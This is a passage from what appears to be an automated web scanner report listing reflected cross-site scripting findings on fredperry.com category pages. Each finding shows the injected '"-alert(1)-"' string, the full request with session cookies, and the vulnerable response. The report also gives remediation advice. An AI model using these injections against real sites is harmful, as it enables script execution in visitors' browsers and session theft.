<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women8fec6"-alert(1)-"0f7c2574e94/amy-winehouse/");
//]]>
...[SNIP]...

1.253. http://www.fredperry.com/women/amy-winehouse/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92813"-alert(1)-"4542ebe28f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/amy-winehouse92813"-alert(1)-"4542ebe28f8/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bj52mihcqnv87j59oben847e36; expires=Tue, 09-Nov-2010 17:11:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/amy-winehouse92813"-alert(1)-"4542ebe28f8/");
//]]>
...[SNIP]...

1.254. http://www.fredperry.com/women/amy-winehouse/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9291"-alert(1)-"93024d59deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/amy-winehouse/?d9291"-alert(1)-"93024d59deb=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=gufs30tkuq7tsvkseov3hags26; expires=Tue, 09-Nov-2010 17:09:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Amy Win
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/amy-winehouse/?d9291"-alert(1)-"93024d59deb=1");
//]]>
...[SNIP]...

1.255. http://www.fredperry.com/women/dresses/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/dresses/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25282"-alert(1)-"158d6988500 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women25282"-alert(1)-"158d6988500/dresses/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:07:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jfe33a0hqu3ps2h8sq0i0aat74; expires=Tue, 09-Nov-2010 17:07:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women25282"-alert(1)-"158d6988500/dresses/");
//]]>
...[SNIP]...

1.256. http://www.fredperry.com/women/dresses/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/dresses/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb509"-alert(1)-"f266c581b8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/dressescb509"-alert(1)-"f266c581b8c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:07:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=f086sn2pv4tc4qtl4v9125gp50; expires=Tue, 09-Nov-2010 17:07:31 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/dressescb509"-alert(1)-"f266c581b8c/");
//]]>
...[SNIP]...

1.257. http://www.fredperry.com/women/dresses/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/dresses/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e413f"-alert(1)-"b0fd3b1a901 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/dresses/?e413f"-alert(1)-"b0fd3b1a901=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:05:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=221l38upcp25ht23t6dhihv926; expires=Tue, 09-Nov-2010 17:05:53 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/dresses/?e413f"-alert(1)-"b0fd3b1a901=1");
//]]>
...[SNIP]...

1.258. http://www.fredperry.com/women/jackets/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/jackets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ceb63"-alert(1)-"988eea48a0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womenceb63"-alert(1)-"988eea48a0f/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:06:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=r2u0bkdmhpeoie140jqga16s62; expires=Tue, 09-Nov-2010 17:06:56 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womenceb63"-alert(1)-"988eea48a0f/jackets/");
//]]>
...[SNIP]...

1.259. http://www.fredperry.com/women/jackets/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/jackets/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43191"-alert(1)-"f4d25c2ca9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/jackets43191"-alert(1)-"f4d25c2ca9e/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:07:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ao426si1mmbbjr0edk92t0aes3; expires=Tue, 09-Nov-2010 17:07:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/jackets43191"-alert(1)-"f4d25c2ca9e/");
//]]>
...[SNIP]...

1.260. http://www.fredperry.com/women/jackets/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/jackets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a4b8"-alert(1)-"3bbedec9e5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/jackets/?2a4b8"-alert(1)-"3bbedec9e5f=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:05:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=pfcri497r2ueetea7urcohu747; expires=Tue, 09-Nov-2010 17:05:31 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/jackets/?2a4b8"-alert(1)-"3bbedec9e5f=1");
//]]>
...[SNIP]...

1.261. http://www.fredperry.com/women/knitwear/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/knitwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11b29"-alert(1)-"273e9eef3e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women11b29"-alert(1)-"273e9eef3e5/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4o7qubhm2bo1i8btr5tc4oect0; expires=Tue, 09-Nov-2010 17:05:47 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women11b29"-alert(1)-"273e9eef3e5/knitwear/");
//]]>
...[SNIP]...

1.262. http://www.fredperry.com/women/knitwear/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/knitwear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e61f7"-alert(1)-"884c352a4e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/knitweare61f7"-alert(1)-"884c352a4e4/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:06:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=mi0e2ngejjg98skppdnt2esdr6; expires=Tue, 09-Nov-2010 17:06:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/knitweare61f7"-alert(1)-"884c352a4e4/");
//]]>
...[SNIP]...

1.263. http://www.fredperry.com/women/knitwear/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/knitwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44619"-alert(1)-"dbe8083a92f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/knitwear/?44619"-alert(1)-"dbe8083a92f=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jg2bea0k5a1bi85j6cfjfu1t93; expires=Tue, 09-Nov-2010 17:04:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/knitwear/?44619"-alert(1)-"dbe8083a92f=1");
//]]>
...[SNIP]...

1.264. http://www.fredperry.com/women/shirts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c1d6"-alert(1)-"97d7c111880 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women4c1d6"-alert(1)-"97d7c111880/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:06:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ri1i2t61fio44aap2f55471d51; expires=Tue, 09-Nov-2010 17:06:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women4c1d6"-alert(1)-"97d7c111880/shirts/");
//]]>
...[SNIP]...

1.265. http://www.fredperry.com/women/shirts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef5c3"-alert(1)-"8cfe24c93e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/shirtsef5c3"-alert(1)-"8cfe24c93e6/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:06:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j2ij7luab3bn191k5buu7ph790; expires=Tue, 09-Nov-2010 17:06:48 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/shirtsef5c3"-alert(1)-"8cfe24c93e6/");
//]]>
...[SNIP]...

1.266. http://www.fredperry.com/women/shirts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2d16"-alert(1)-"a05c72fdefc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/shirts/?e2d16"-alert(1)-"a05c72fdefc=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
